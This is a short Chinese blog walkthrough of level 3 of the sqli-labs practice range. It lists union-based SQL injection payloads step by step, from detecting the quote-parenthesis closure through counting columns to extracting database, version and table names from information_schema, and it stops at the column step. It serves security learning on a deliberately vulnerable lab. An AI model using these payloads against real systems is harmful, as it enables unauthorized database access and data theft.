web——sqliabs靶场——第三关

今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点

/?id=1'

有注入点

判断注入点类型

输入/?id=1') and 1=2 --+

3.判断它的字段数

/?id=1') order by 1-++

/?id=1') order by 2-++

/?id=1') order by 3-++

/?id=1') order by 4-++

爆出显示位

/?id=-1') union select 1,2,3 --+

开始判断库名

?id=-1') union select 1,database(),version() --+

判断表名

/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据

相关推荐
liuxin3344556636 分钟前
高效编程训练:Spring Boot系统设计与实践
数据库·spring boot·php
地图之家家长2 小时前
19.(开发工具篇mysql库)mysql锁表问题解决
数据库·mysql
秋意钟4 小时前
Java注解
数据库
看山还是山,看水还是。5 小时前
Oracle的字符串函数
运维·数据库·安全·oracle
东方巴黎~Sunsiny5 小时前
⚙️ 如何调整重试策略以适应不同的业务需求?
java·数据库·kafka
daopuyun5 小时前
全面介绍软件安全测试分类,安全测试方法、安全防护技术、安全测试流程
网络·数据库·安全·安全测试
綦枫Maple6 小时前
Jmeter基础篇(23)TPS和QPS的异同
数据库·jmeter·oracle
川石课堂软件测试6 小时前
性能测试|JMeter接口与性能测试项目
javascript·数据库·python·jmeter·单元测试
oneslide6 小时前
达梦数据库迁移j脚本
数据库